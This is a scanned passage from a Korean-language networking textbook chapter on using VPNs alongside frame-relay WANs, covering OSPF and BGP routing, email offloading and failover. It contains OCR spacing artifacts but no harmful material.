루어 지며 취약점들이 많은 곳을 통과하지만 자료는 인증되고 암호화되므로 보호된다. 
그러 나 일부 우점들은 그렇게 확고하지는 못하다. 좋은 실례는 그 기업의 여 러 위 치들에 
서 여러 외부기관들과 다중접속들을 요구하는 경우이다. 

지 리적 으로 널 리 퍼 져 있는 기 관은 다른 기 관들과 여 러 싸이트에서 여 러 가지 접속을 
가질 수 있 다. 각이한 여 러 곳에 서 엑 스트라네 트와 접 속되 여 있는 싸이 트들이 있 을수 있는 
데 일부 경 우에 매 접속은 자기의 경 로기 와 FR 봉사제 공자를 가질수 있다. 

그런 환경에서는 보안에 어려운 문제들이 많이 제기된다. 한 망의 다른 망에 대한 
공격 들，더 욱 우심 하게 는 그 기 관망이 제 공하는 접 속을 리용하는 엑 스트라네 트들사이 의 
공격 을 없애 기 위 하여서는 접근을 엄격 히 통제하여 야 한다. 때때 로 통신에 리용할수 있 
는 활동을 제 한하는 경로기의 접근조종목록 ( ACI ᅲ Access Control List ) 들을 보안에 적용 
할수 있다. 일부 기관들에서는 방화벽뒤에 전용망을 할당하여 보안을 보장한다. 많은 경 
우에 보안은 중심 적 으로 관리하는 방화벽 이면 충분하다. 유일하게 문제 거 리 로 되 는것 은 
많은 방화벽들이 비용이 많이 들게 되므로 제한된 요구와 수명을 가진 망들에 방화벽을 
덧붙이자면 비용의 효과성이 없는것이다. 

그러 나 안전하고 유연한 VPN 을 위하여 효과적으로 전개될수 있는 각이한 형식과 크 
기를 가진 비용의 효과성을 담보하는 여러가지 제품들이 있다. 경로기에서 IPsec 봉사를 
할수 있는 조건에 서 이 제 품들은 많은 경 우 기 초통신，경 로조정 규약들，방화벽봉사，인증 
은 물론 광범 위한 VPN 봉사도 보장할수 있 다. 결 국 VPN 계 획 은 빨리 작성 되 여 경 로기 에 
실 현 하면 한 점 을 통한 접 근조종에 리용될 수 있 다. 경 로기 에 실 현 하는 방책 은 접 속할 때 
에 세 부사항들을 리용하여 해 당 통신을 식 별 하며 정 확한 보안대 책 은 물론 망접 근도 통제 
한다. 
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통합된 망 


VPN 이 산업 에 처 음으로 도입 된것 은 원격접 근을 해 결 하기 위 해서 였 다. 큰 모뎀 묶음 
(modem pool ) 에 전화로 신청 하면 류동사용자들은 흔히 무료번호나 그들이 가정 사무실 에 
접속하군 하던 접근번호들을 제공 받았다. 원격접근해결책을 세울 때 와 마찬가지 로 그 
비 용은 시 간에 좌우되 였 다. VPN 은 원격 사용자에 게 인 터네 트접 속과 가정 사무실 에 로의 개 
별 통로개 설 을 가능케 하였 다. 인 터네 트접 속은 시 간제 한이 심하지 않으며 일 반적 으로 비 
용의 효과성 이 높았다. 한개 장치 를 수천명 이 동시 에 리용할수 있 으므로 가정 사무실 에 서 
는 비 용이 훨씬 더 많이 절 약되 였 다. 이 방법 은 전통적 인 전화가입 식대 안에 비 하여 일대 
획기적인 비약이였다. 

이 기간에 많은 기관들에서는 동일한 개념을 망 대 망통신에 리용할수 있지 않겠는 
가고 생 각하고 있 었 다. 이 문제 는 자택근무하는 사람들에 게 원격사무실 즉 가상사무실을 
지원하는 형 태로 시작되 였다. 광대역 인터네트접근을 전용으로 사용할수 있게 됨 으로써 
VPN 리용이 폭발적 으로 늘어 나 가정 들과 원격사무실 들에 서 는 비 용의 효과가 크고 높은 
대역너비의 접근이 가능하게 되였다. 

동일한 개념들을 리용하여 전통적인 WAN 을 강화할수도 있다는것이 곧 명백해 졌다. 
원격사무실지원에 대한 개념을 확장하여 기관의 수많은 부분들의 싸이트들을 지원할수 
있게 되였다. 통신의 요구나 대역너비가 제한된 싸이트들에는 흔히 VPN 이 사용되였다. 
통신에 대한 요구가 거의 필요 없는 이동업무를 기관의 일부 사람들에게 시키는것은 
VPN 이 고장나도 기 업운영 에 영향이 거의 미치지 않을것 이 라고 생각하기때문이 다. 이 런 
현상이 많은것 은 인 터네 트와 VPN 기 술자체 에 대 하여 잘 모르고 있는 사정 과 관련된 다. 

오늘 많은 기 관들은 인 터네 트접 근점 들을 여 러 싸이 트들에 가지 고 있 다. 이 점 들은 다 
른 사무실과 동업 자들사이 에 VPN 을 구축하는데 리용할수 있 다. 전통적 인 WAN 기 술과 
VPN 에 기초하여 구축한 혼합 WAN 의 우점들은 일정한 조건에서 명백해 진다. 

론리적독립 

회 사들에는 흔히 하나 또는 그이 상의 회 사사무실 이 나 자료집 선기 들이 있 다. 사무실 
이나 자료집선기는 다른 지사，작은 원격사무실，가상가정사무실，원격사용자들에게 전자 
우편과 자료관리 와 같은 각이한 봉사를 보장한다. 지 사들과 같은 자료집 선기 가 없는 장 
소들사이의 통신은 큰 기관들의 경우에 특히 기업단위들이 여러 곳에 널려 있는 경우에 
부하가 크게 걸린 다. 

그림 15 — 1은 싸이트들을 서로 련결시키는 전통적인 망을 보여 준다. FR 구름은 PVC 
의 리용을 통하여 접 속을 보장한다. 이 를 위하여 원격 싸이트는 FR 구름에 접 근해 야 한다. 
FR 봉사제공업체가 어떤 지역에 봉사를 제공하지 않는다면 그곳의 기관은 또 다른 회사 
를 리용하지 않으면 안되며 FR 회 로련결업체 에 의거해 야 할것 이 다. 이것을 피 하기 위하여 
일부 기관들이 VPN 을 리용하게 되는것은 흔히 인터네트에 쉽게 접속할수 있는 사정과 
관련된다. 
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그림 15-1. 전통적인 WAN 환경 



그림 15 — 2. 기초 VPN 사용 


그림 15 — 2에서 보는바와 같이 VPN 은 FR 에 기초한 WAN 에 신속히 병합되여 정보 
통신을 보장할수 있 다. WAN 에 1차적 으로 인 터네 트접 속을 하면 싸이 트는 중앙화된 자료 
에 접 근을 할수 있 다. VPN 을 리용하는 많은 원격 싸이트들을 추가할수 있 다. 회 사싸이트 
에 초기 투자를 한 이 상 원격장소에 또하나의 싸이트를 첨 부하려 면 비 용을 들여 야만 한다. 
현재 회 사사무실 로부터 원격사용자에 게 로의 접 근 혹은 경 영 자의 집 으로부터 원격 사무실 
에로의 접근을 VPN 이 보장할수 있다는것은 주목할만한것이다. 

그림 15_3에서 보여 주는바와 같이 회사싸이트는 WAN 을 통하여 다른 위치들에로 
가는 관문으로 리용될수 있다. 이 실례에서는 VPN 이 전통적인 통신망과 얼마나 류사한 
가 하는것 을 명 백하게 알수 있 다. 흔히 중앙싸이트가 WAN 전반에 통신을 보장하는것 은 
보기 드문 일 이 아니 다. 이 구성 은 보통《 수레 바퀴 》 (hub & spoke ) 라고 하며 많은 회 사 
들은 이러한 구성구조를 리용한다. 
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그림 15 — 3. VPN 통합 


원격 싸이트들이 첨 부됨 에 따라 VPN 은 하나의 분리 된 WAN 으로 리 용될수 있으며 집 
선기싸이트는 정상적 인 수레 바퀴형 WAN 조작에서처 럼 하나의 단순한 관문으로 취급된다. 
VPN 은 충분한 유연성과 비용절약 그리고 원격접근지원을 포함하는 보충적인 우점들도 
가지 고 있 다. 그리 고 이 미 리용하여 오는 WAN 과 비 슷하게 동작한다. 

회 사들이 성 장하면서 매 싸이 트는 WAN 상에 서 의 인 터 네 트전송흐름을 줄이 기 위 하여 
인터네 트접속을 보장 받는다. 인터네 트접속이 많으면 많을수록 그만큼 위 험성도 커 진다. 
그러 나 자기 환경 에서 인터네 트에 몇개의 접속을 가지는 기 관들은 FR 세 계 에서 는 불가능 
한 방법 으로 VPN 을 가동시 킬수 있다. 



그림 15-4. 론러적 자유도를 보장하는 VPN 
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그림 15_4에서 보는바와 같이 본래의 회사싸이트를 지나 최종목적지까지 곧바로 가 
닿을수 있도록 VPN 을 구성할수 있 다. 더 욱 흥미 있는것 은 그 과정 이 자동적 이라는것 이 
다. 실례 로 원격 WAN 싸이 트의 주소가 10.10.10.0 이 고 VPN 종단을 제 공하는 회 사싸이트의 
주소가 20.20.20.0 이 면 원격 보관고는 10.10.10.0 을 요청 하게 될 것 이 다. VPN 선택 항목하나만 
이 있을 경우에 요청은 VPN 을 지나서 WAN 이 10.10.10.0 망에로 통신을 보장하는 
20.20.20.0 망에로 보내지게 될것이다. 그러나 10.10.10.0 망이 VPN 능력들을 가지는 경우에 
원격보관고는 10.10.10.0 에 로의 전송흐름을 그 싸이트의 VPN 장치 에 로 보내 도록 쉽 게 설 
정 될수 있 다. 20.20.20.0 망에 서 도 경 우는 마찬가지 다. 

경로조정의 틍합 

경 로조정 규약들은 복잡한 망들에 서 통신관리 를 위하여 쓰인다. 이 규약들은 사 
용자자료와 같은 통신통로를 가지 며 택 한 경 로를 기 억한다. 실례 로 거 리 벡 토르경 로 
조정규약은 싸이트들사이의 거리에 기초하며 련결상태경로조정규약은 련결이 이루어 
지도록 한다. 어느 경우에 나 이 런 기초원리들과 비용 및 대 역너비리용과 같은 관리 
상 제 한조항들에 기 초하여 경 로선택 이 진행 된다. 이 런것 들을 정 의하는것 은 매 우 간단 
하다. 그러나 목적은 망자체에서 수집된 정보에 기초하여 망에서의 자료방향을 잡아 
주는것 이 다. 

때 문에 전통적 인 망들이 VPN 들을 통합함에 따라 경 로결정은 새 로운 의미를 띠 게 된 
다. 실례 로 세개의 싸이트를 VPN 들에 옮긴 다섯개 싸이트를 가진 WAN 의 경 우 인터네 
트싸이트들사이 에서는 결정해 야 할 일 이 거의나 없는것 이 다. 통신통로가 가상적 이기때문 
에 경로조정규약은 통로를 표상적으로만《 아는것》이다. 경로조정규약파케트가 VPN 에 
최 종적 으로 유도되 는 자료흐름에 주입되 면 규약파케 트는 파케 트외 피 와 호상작용하는 복 
잡한 통신망을 통과하게 되지만 본래의 경로조정규약파케트는 자기 보호막을 쓰고 조용 
히 통과한다. 경로조정규약의 견지에서 보면 망은 완전무결하다. 

VPN 을 구성하는 큰 망들에서 는 경 로조정 규약에 대 하여 모르고 있는것은 더 말할것 
도 없고 또한 어떤 체계가 고장나는 경우 경로기의 인터네트쪽에서는 크게 어찌할 방도 
가 없게 될것이다. 원격체계가 고장나면 경로조정규약과 갈은것을 리용할 방도를 찾는것 
이 아니 라 오히 려 다른 통로를 즉시 개 설할수 있 다. 혹은 최 종목표에 대 한 종속통로를 
가질수 있는 또하나의 싸이트에 접 속을 실현할수도 있 다. 이 접 속점 으로는 전통적 인 
WAN 접속점도 될수 있을것이다. 

방책에 기초한 경로조정 

VPN 들을 기성통신망에 통합시키는 흥미 있는 변화가 일어 나고 있다. 경로조정결정 
들은 분할되 여 각이하게 처 리된다. 우선 경 로조정규약은 대체 로 전통적 인 WAN 에서는 
찾아 볼수 없는 단순한 통신망들에서 쓰이며 경로조정결정들은 VPN 을 보장하는 변두리 
장치 들에 로 이 동하였 다. 한편 인 터네 트우에 덮 인 구름인 VPN 은 모든 경 로들을 다 조정 
하고 있는 신비 스러 운《 검 은구멍 》 (black hole ) 으로 되 고 있다. 



OSPF(Open Shortest Path First ) 는 여 러 지 역 개 념 도입 에 의 한 계 층구조를 보장하는 경 
로조정 규약이 다. 지 역 들은 관리 자령역 들을 제 공하며 최 종적 으로 지 역 0과 작용하는 경 로 
조정정보를 요약하는데 도움을 준다. 실례로 든 망에서 보면 지역 0에는 3개의 경로기 
즉 지 역 경계경 로기 ( ABR : Area Border Router 외 A , B , (기들이 있다. 매 경 로기는 VPN 에 
의하여 통신을 진행한다. 지 역 0에서 정 보를 공유하는외 에 매 지 역은 지 원지역 을 구성하 
는 원격 싸이트들에 다른 경 로기 들을 가진다. 



그림 15_5에서 보는바와 같이 인터네트에 기초한 VPN 은 지역 0이며 원격싸이트들 
은 3개 의 부분지역 들을 말한다. 망과 관련된 경 로조정 정 보는 부분지역 들과 해 당한 ABR 
들사이에 공유한다. 그 정보는 또한 각 ABR 들사이에 공유되며 최종적으로는 ABR 들이 
지 원하는 부분지역 들사이 에 공유된다. 이 씨 나리 오에 서 전체 망은 모든 통신상태 들을 알 
게 되며 그 자료에 기초하여 결심채택을 할수 있다. 지역 0안의 련결정보를 ABR 들사이 
에 공유하는것 은 필수적 이 다. 그것 은 부분지역 경 로조정자료들이 다른 ABR 들과 부분지역 
들에 보장되 게 하며 또한 가장 좋은 즉 구성 된 통로가 그 통신에 리용되 도록 하기 위해 
서 이 다. 실례 로 전통적 인 WAN 에서 A 로부터 표를 거 처 C 에 로 통로를 설정하는것은 덜 
비 싸거 나 더 쉬 울수 있 다. 이 러 저 러한 변화를 일 으키 자면 통신망에 서 확보된 지 역 0의 
특이한 정 보가 ABR 들사이 에 공유되 여 야 한다. 

VPN 이 지역 0에 일단 도입되면 ABR 들사이로 흐르는 OSPF 는 교갑화된다. 때문에 
지 역들사이 에 정 보는 공유되지만 ABR 들은 지 역 0으로부터 정 보를 거의 얻지 못한다. 실 
제로 얻을수 있는 정보가 거의 없는것이다. ABR 들사이로 흐르는 OSPF 를 통신망으로부 
터 얻 을수 있 었 다면 그 통신망은 인 터네 트였 을것 이 며 통로는 쉽 게 변동시 킬 수 있 었 을것 
이다. 

결과 경로규약이 원격싸이트들사이의 정보전달자로 되지만 가상정보통신에는 영향을 
미치지 않게 된다. VPN 이 복잡하며 인터네트로부터 정 보를 거의 얻 을수 없으므로(그리 
고 얻을수 있는것은 너무 복잡하여 사용할수 없다.) 통신방식절환을 위한 방책을 세울수 
도 있다. 그러나 VPN 의 가상통로가 대체로 자유롭기때문에 VPN 을 적용할수 있는 경우 
에 는 그것 만 구성하면 된 다. 
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VPN 이 결정된 경로조정 


설명한바와 같이 상용 WAN 에 서 는 A 로부터 B 를 거 쳐 C 에 로 경 로설정 을 하는것 은 
특히 A 에 C 를 접 속하는것 이 실패하는 경 우에 적 용할수도 있는것 이 다. 경 로조정 규약에 
서 는 고장이 있는 경우에 B 를 거 쳐 경 로조정 을 다시 하는것 이 실행할수 있는 대 안으 
로 될수 있다고 한다. VPN 에서는 이것이 구성에 따라 다를수도 있지만 더욱 심해 질 
수 있다. 실례로 인터네트접속이 싸이트 이서 끊어 졌다고 하자. 그런데 cl 로부터 b 2 
에 로의 접 속과 같이 싸이트 표에 는 자기 의 하위 지역 싸이트들이 있 게 된 다. ABR 들에 는 
다른 경 로도 있지 만 너 무 비 싸므로 사용할수 없 다. 인 터네 트접 속이 끊어 지 는 경 우에 
VPN 은 실패하며 경로조정규약은 통과할 VPN 이 없기때문에 결심채택을 할수 없다. 
한마디 로 말하여 그 자료와 경 로조정 규약의 출구점 은 오직 인 터네 트대 면부이다. 이 
점 에서 VPN 방책은 수신지에 기초한 특정된 VPN 을 통한 정 보를 접수하고 경 로를 설 
정 한다. 

이 문제 점 을 해 결 하기 위하여 VPN 체 계 들은 경 로조정 규약에 서 배 울수 있 으며 학습하 
는것을 자기 방책에 포함시킬수 있다. 경로조정규약이 대면부에 주입되고 그것이 통과하 
는 최종 VPN 이 방책 에 의하여 결정 되 기때 문에 그 방책 은 A 와 B 사이 에 VPN 이 사용될수 
있다고 결론을 내릴수 있는것이다. 그것은 cl 과 W 사이에 있는 A 와 C 지역들사이에 다른 
통로가 있는 사정과 관련된다. 

VPN 은 그것의 VPN 들을 경로조정규약에로의 통로들로 광고할 필요는 없다. 그것은 
통로들이 인차 만들어 졌다가 없어 질수 있기때문이다. 경로들을 창조하고 삭제하는것은 
경 로조정 규약을 크게 파괴할수 있 다. OSPF 와 같은 많은 경 로조정 규약들은 새 로운 경 로 
가 발견되거 나 이미 있던 경로가 삭제되 자마자 합쳐 지는것은 아니지만 경로가 나타나거 
나 사라지는 빈도수와 지속시 간에 따라 영 향을 받는다. 

방책안과 경로조정규약의 복잡한 결합에서의 최종장애는 한 위치에 있는 인터네 
트에 대한 접속이 여 러개 있을 때 나타난다. 이 시점에 경로조정에 대한 두 갈래방법 
은 계3의 방법 을 요구한다. 전형 적 으로 경 계관문규약 ( BGP ) 은 하나의 기 관에 대 한 다 
중접 속을 관리 하기 위하여 ISP 들이 리용하는 규약이 다. 그 기 관은 ISP 의 BGP 경 로조정 
표를 통하여 ISP 로부터 인 터네 트에 로의 경 로들을 알게 되 며 또한 ISP 는 고객 의 구내 
설비 에서의 변화들을 알게 된다. VPN 체 계 들에서는 다중경 로들을 고려해 야 한다. 그러 
나 싸이트들사이 의 ( IP 주소변화와 같은) 론리 련결 이 파괴 되 지 않는 한 VPN 은 경 로가 
변경되여도 작용할것이다. 

VPN 은 전형 적 으로 접 수지에 따라 경 로를 설정하며 종단점 은 방책 에 의하여 식 별되 
며 해 당 VPN 종단점에 자료를 보내게 된다. VPN 장치 가 경로조정규약을 학습하기때문에 
이 장치 들은 경 로조정 규약대용품으로 될수 있으며 경 로조정 정 보의 공유를 서 로 보이 지 
않게 완전무결 하게 진행할수 있 다. 
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WAN 의 부하경감 


VPN 들의 가장 명백한 사용법의 하나는 WAN 부하를 경감하는것 이 다. 그 전제는 
WAN 을 교체하는것 이 아니 라 강화하는것 으로서 VPN 하부구조를 리 용하는것 이 다. 보충투 
자나 복잡한 조종이 없이 도 VPN 들을 실행할수 있으며 WAN 과 협 력하면 보다 큰 흥미 
있 는 결 파를 얻 을수 있 다. 

VPN 이 WAN 의 대용으로 실현될 때에는 새로운 하부구조의 가상적성격이 스스로 쉽 
게 실현되게 된다. 원래 원격접근을 위하여 준비된 현존하부구조를 가지고 그것을 원격 
사무실지원구조에 맞추어 동작시켜 WAN 부하경감을 보장하라. 이 개념들의 대부분은 준 
비계획 이 포괄적 인 경우에 초기투자에서부터 실현을 볼수 있다. 

시간에 덜 민감한 ■신망들 

오늘의 기술적환경에서는 모든것이 다 민감한듯하다. 그러나 시간에 민감하지 않는 
많은 콤퓨터사용자들이 사용하는 응용프로그람들도 있 다. 

전자우편은 채트와 같은 다른 응용프로그람에 비하여 시간에 민감하지 않은 응용프 
로그람의 한가지이다. 더욱 흥미 있는것은 많은 회사들에서 전자우편이 기업운영의 중요 
한 한몫으로 되는데 이 전자우편의 즉시배달은 예견되지도 요구되지도 않는다. 전보를 
몇분 기 다리는것은 거의 문제 로 되지 않는다. 일부 경우에 전자우편은 기 관들의 생 명선 
으로 되 는것 외 에 자료공유가동환경 으로 리 용된 다. 



그림 15-6. VPN 은 대용통신 또는 특정응용을 보장한다. 










전자우편은 통신망에 큰 부담을 줄수 있다. 늘어 나는 전자우편의 요구에 맞게 오직 
능력을 높이기 위하여 일부 통신망들이 솜씨 있게 가동된다고 하는것은 말이 되지 않는다. 

VPN 망은 WAN 과 곡같이 구성되여 특수응용에 리용될수 있다. 실례로 그림 15_6에 
서처럼 VPN 은 한 령역전반에서 전자우편중계를 위한 통신가동환경으로 될수 있다. 

많은 전자우편하부구조들에 서 우편봉사들사이 에 협 력하는것 은 최 종수신지 에 전자우 
편을 보내 기 위 해서 이 다. 공공우편봉사는 회 사본부의 한 점 에서 인터네 트에 접 속된다. 전 
자우편이 원격싸이트에 있는 사용자에게 접수되는 경우 1차적인 봉사기가 사용자의 우편 
통을 가지고 있는 봉사에 그 전자우편을 보내면 그 전자우편은 후에 본문에서 전달된다. 
우편봉사기들은 론리적으로 접속된다. 또한 싸이트와 같이 봉사기들을 관리단위로 묶어 
주는 호상관계 가 수립된다. 

봉사기 들사이 의 련계 는 정 상통신통로로부터 VPN 방향으로 자료흐름을 보내 는 식 으로 
구성된다. 우점은 인차 명백해 져 야 한다. 큰 배 달품목록들, 소식지들, 일반통신물들을 인 
터네트로 내보내면 거기 에서는 대역너 비제한이 있어 속도가 느리지만 대 신 WAN 은 그 
부담에서 벗어 나게 된다. 

WAN 을 통과하는 다른 자료흐름에 관계되는 전자우편의 량에 따라 실제적 인 비용절 
약은 초기 VPN 의 실행기 간에 생 긴 본래의 절 약이상으로 실현된다. 실례 로 WAN 에서 대 
역너 비요구가 줄어 든다면 비용도 또한 줄어 든다. 

VPN 의 리용은 값 비 싼 WAN 고리 들을 통하여 응용프로그람을 얼 마 쓰지 않는 국제 
회 사들에서 특별히 의의 있는것 이 다. 어떤 큰 기관들은 우편물송달공정을 리용하여 부하 
를 줄이고 다량처 리하여 세 계적 으로 노력을 합친다. 이 우편물묶음은 VPN 으로 쉽게 배 
달되여 시간에 더욱 민감한 응용프로그람비용의 효과성 이 높지 못한 WAN 의 부하를 줄 
이고 있다. 

우편물송달의 또하나의 실례 로서는 소매 업 에서 보게 된다. 많은 회사들이 운영 을 묘 
하게 하여 판매 점 ( POS ) 정 보를 수집 하고 신용장검 증，현지상품시 장과 같은 제 한된 현지 공 
간들을 보장한다. 모든 공간들이 전국적 또는 전 세계적규모에서 기업을 관리할수 있게 
정보를 가정사무실에 보낼 필요가 제기될 때가 다가온다. 위성으로 상점들(전국적으로 
거의 120개 상점들)에 통신을 보장한 일이 있다. 매 위치에 경로기가 있어서 POS 체계，전 
자우편 그리고 어떤 경우에는 전화선들에 IP 접속성을 보장하였다. VSAT 봉사비와 지상국 
장비가 협력함으로써 인터네트접속과 VPN 은 거의 40%의 비용을 절약하였으며 대역너비 
는 50%나 늘어 났다. 결과 우편송달시간은 짧아 졌고 최종적으로 위험한 상태에 있었던 
처 리주프레 임주파수가 늘어 나게 되 였 다. 

한 문제를 해결함으로써 여 러 가지 문제 가 풀렸을뿐아니 라(대 역너 비를 늘이고 가공주 
파수를 늘이게 된것) 매 상점들은 VPN 능력을 가지게 되였다. POS 응용능력이 커짐에 따 
라 지 역 제 품공급을 직 접 할수 있도륵 상점사이 의 결제 가 가능하게 되 였 다. 즉 등록기 스 
캐 너 (register scanner ) 는 회 사사무실 에 의 뢰 하지 않고 고객 이 요구하는 제 품이 있는 위 치 
에서 제 일 가까운 곳에 상점 을 정할수 있다. 이것 이 혁신이 아니 라 그런 거 래를 위하여 
활력 있는 VPN 을 창조하는것이 혁신이다. 

보안은 최종적인 우월한 부하경감이다. 물론 보안은 VPN 들을 위한큰 판매점이며 
이 말들은 때로는 서로 동떨어 져 있는듯 하다. 그러 나 이 장에서는 암시된 보안보다 오 
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히려 통신기술의 리용에 대하여 언급한다. 보안은 실제적인 재부이다. 실례로 전송시 전 
자우편을 보호하도록 전자우편부하경 감도해 를 구성 할수 있 다. 조작체 계 수준에 서 매 우편 
봉사들사이에 VPN 을 창조함으로써 분야안에 있는 모든 교환의 암호화를 실현할수 있다. 
우편 암호화프로그람을 널 리 리용할수 있 음에 도 불구하고 많은 사용자들은 그것 들을 사용 
하지 않는다. 기관에서 사용자들에게 최종적으로 전송내용을 암호화하도록 할 때에는 행 
정 관리열쇠 를 넣 어 주어 불만스러 워 하는 종업 원이 자료를 빼 내지 못하게 해 야 한다. 

VPN 의 보안에는 우점 이 있다. 해당 부문안에서 자료흐름이 암호화되면 사용자들은 
더는 어쩔수 없게 된다. 물론 이것을 직접 PGP(Pretty Good Privacy) 또는 증명서와 비교할 
수는 없다. 그러나 그것은 일반관측자가 흘러 가는 전자우편에 접근하지 못하도록 하는 
것 이 다. 부문안에서 배 달을 위한 암호화를 적용하지 않는 모든 전자우편체계 에서 전자우 
편은 모든 점 에서 로출된다. 즉 인터네 트와 인트라네 트에서 그러하다. 

장애넘기 

VPN 에서 흥미 있는 측면의 하나는 VPN 이 구성되면 선택의 세계가 시작되는것이다. 
하나의 점(그것은 또한 단일원가로 인정될수 있다.)을 통하여 여러가지 가상접속들을 다 
중화함으로써 본래 의 투자를 리용하여 여 러 가지 다른 기 회 들을 택 할수 있 게 된 다. 

한가지 실 례 는 WAN 장애 넘 기 이 다. WAN 장애 넘 기 는 VPN 과 WAN 의 합침 과 같은것 이 
다. 그러 나 WAN 하부구조의 어 떤 곳에서 고장으로 하여 막히군 하는 원래 의 통화량의 
일부나 전체에 VPN 이 후보경로를 보장할수 있다. 

시장의 실례를 보자. 전국의 각이한 의뢰기에게 응용봉사뿐아니라 FR 봉사를 제공해 
주는 Phoenix 라고 부르는 한 봉사제공자 (SP) 는 고객 및 봉사련합기 업체들을 많이 가지고 
있다. 일부 의뢰기 들은 간단한 FR 봉사를 요구하며 다른 고객 들은 인터네트접근을 위하여 
SP 를 리용한다. 이 의뢰기들중 많은 고객들은 ERP 체계，인적자원체계，전자우편，정보안 
내체 계，싸이 트외 부보관 그리 고 협 력 도구들의 말단사용자들이 다. 봉사수준을 유지 하기 위 
하여 Phonenix 는 통신망관리 와 의 뢰기들, 응용프로그람들과 정 보통신들에 대 한 지 원을 보 
장하는 망운영 쎈 터 (NOC) 를 유지한다. 

FR 가 고장이 나는 경 우에 는 FR 고객 들을 위하여 VPN 을 동작시 켜 응용프로그람을 지 
원 할수 있 다. 많은 기 관들은 인 터네 트는 물론 전용통신망도 가지 고 사활적 인 통신을 보 
장하고 있 다. 접 속에 의 거하여 다른 망을 효과적 으로 리용하면 큰 장애 를 극복할수 있는 
기회들을 마련할수 있다. 

그림 15—7에서 볼수 있는바와 같이 전용접속은 인터네트접속과의 협력에 의하여 창 
조될수 있다. 

Phoenix 에 는 표준 FR 구름이 있어 의뢰 기들을 지 원한다. 이 통신망은 기 본교환기를 통 
하여 NOC 에 접 속된다. VPN 공급장치 는 교환기 에 접 속된다. 이 실례 에서는 방화벽 이 
VPN 접속장치이 기도 한데 이 방화벽 이 인터네트에 련결되 여 있다. 의뢰기망에는 두개의 
대 면부가 설치된 경 로기 가 있다. 하나는 전용회 로접속을 위한것 이고 다른 하나는 인터네 
트를 위한것 이 다. 
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주의 : 의 뢰기망상에 하나의 경 로기 가 있으면 Phoenix 는 물론 인터네트와의 
통신은 가능하게 된다. 그림에는 간단히 표시되여 있지만 과♦하면 여러개 
의 경 로기 들이 기#상 영 향이 없 이 구성 에 리용될 수 있 다. 

그림 15-7. 후보적 인 통신 혹은 특수응용을 제공하는 VPN 

경 로조정 규약과 VPN 에 대 하여 앞에 서 실 행한대 로 보면 VPN 상에 서 는 경 로조정 규약 
을 적용할수 없는것이다. 사실 두가지 중요한 원인으로 하여 이 경우에 그런 적용을 할 
수 없 다. 경 로조정 규약은 다중방송식 이 나 많은 방화벽틀은 다중방송에 적 합하지 않다. 또 
한 경 로조정 규약들이 방화벽 을 지나도록 하는것 은 그것 이 비 록 VPN 을 위한것 이 라고 하 
더 라도 아주 안전하지는 못하다. 

경 로조정 규약제한들을 수용하자면 두가지 안을 택하게 된 다. 첫 째안은 많은 고객 들 
과 그들의 망을 유지 하는 FR 구름을 통하여 표준적 인것 으로 리용되 는 경 로조정 규약이 다. 
둘째안은 고객의 경로기에서 류동하는 정적경로들을 리용하는것이다. 한마디로 말하여 
자동경 로령역 이 삭제될 때 류동하는 정적경 로는 경 로조정표로 옮겨 진다. 실례 로 OSPF 
가 경 로를 학습하면 경 로는 경 로조정표의 웃부분으로 옮겨 질것 이다. 경 로가 무효로 되 
여 경로조정표로부터 그 경로를 삭제하면 정적경로는 앞서게 된다. 

OSPF 가 때를 Phoenix 에 로 되 돌아 가는(행 정 관리비 용에 의하여 ) 기 본통신으로 보는 
조건에 서 해 결 안은 정 상적 으로 적 용된 다. 회 로가 장애 를 받는 경 우에 는 FR 구름에 로 통화 
흐름을 보내 는 의 뢰기의 경 로조정표에 있는 경 로를 OSPF 가 삭제하게 되 며 인터네 트경 로 
가 대신 들어 가게 된다. SP 에 필요한 파케트가 대면부에 주입될 때 VPN 방책은 통화흐 
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틈을 식 별 하게 되 며 봉사제 공자가 있 는 VPN 을 창조하게 된 다. VPN 이 창조되 기만 하면 
VPN 을 통하여 SP 망에 자료가 자유롭게 흘러 간다. 자료가 의뢰기 에 되돌아 올 때 에는 
그쪽의 FR 경 로기 가 동일 한 경 로를 선택하여 그 파케 트를 VPN 장치 에 로 보내 기 때 문에 그 
자료는 VPN 장치 에 로 갈수 있는것 이 다. 

VPN 에서 의 장애극복은 VPN 이 얼 마나 빨리 구축되 는가에 따라 일정한 시 간이 걸 
린다. 그와는 대조되게 장애대체는 즉시적 이다. FR 회 로가 다시 직결될 때 OSPF 는 련 
결을 탐색한다. 그리 고 일단 그 련결이 정상이 라면 경로조정규약은 새로운 경 로를 경 
로표에 다시 놓는다. 바로 이 순간부터 통화흐름은 FR 구름을 통하여 움직 이기 시 작한 
다. 흥미 있 는것 은 FR 회 로가 VPN 의 수명 이 끝나기전 에 장애 를 받게 되 면 장애극복도 
거 의 순간적 인것 으로 된 다는것 이 다. VPN 이 휴식상태 에 있 으므로 첫 파케 트는 즉시 
송신된 다. 



이 안과 관련하여 두가지 문제가 주목된다. FR 구름이 완전히 장애를 받는다면 
VPN 을 예비로 가지고 있는 FR 고객들은 동시에 VPN 을 요구하게 되여 분명히 VPN 체 
계 는 과중한 부하를 받게 될 것 이 다. 그런 문제 를 해 결하는데는 두가지 방안이 있다. 
부하관리해 결책 은 통화흐름을 VPN 장치들에 다시 보내 여 모든 체 계들에 그 부하를 분 
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산시키는것이다. 값 눅은 방법은 VPN 의 의뢰기경로조종방책을 수정하여 VPN 의 다음 
장치 가 아니 라 다른 장치 에 로 가도록 하는것 이 다. 한마디 로 말하여 부하를 수동적으 
로 분산시키 는것 이 다. 

다른 문제 들이 제 기 되는 경우는 인터네 트의 경 로화가 가능한 IP 주소들 혹은 다른 방 
안을 쓰는 망에 FR 접속을 SP 가 요구할 때이다. 이런것은 흔히 문제가 아니지만 SP 가 관 
리하여 봉사를 보장해 야 하는 고객 구내 설 비 ( CPE ) 가 있 다. 그 실 례 로는 응용관문봉사기 를 
들수 있 다. NOC 는 IP 주소한조를 가지 고 FR 상의 장치 들을 관리하게 된 다. 그러 나 장애극 
복후에는 그 IR 주소들이 변할수도 있다. 

그림 15_7과 류사하게 그림 15_8에서는 NAT (망주소변환)를 리용하여 의뢰기에서 
관리요소들의 원천 IP 주소에는 관계없이 SP 의 NOC 가 언제나 같은 IP 주소를 감시하도록 
한다. 


결 론 

VPN 이 기술계에 소개되였을 때 1차적인 구조는 망 대 망 VPN 이였다. 일부 판매업 
자들은 VPN 기 술의 류동사용자측면을 강조하였 다. 원격사용자지원은 VPN 기 술의 특징으 
로 되 였 다. 이 것은 판매 자가 강조하는 문제 때 문이 였 다. 그리 하여 인 터 네 트는 안전한 수단 
으로 인정되지 못하였다. 

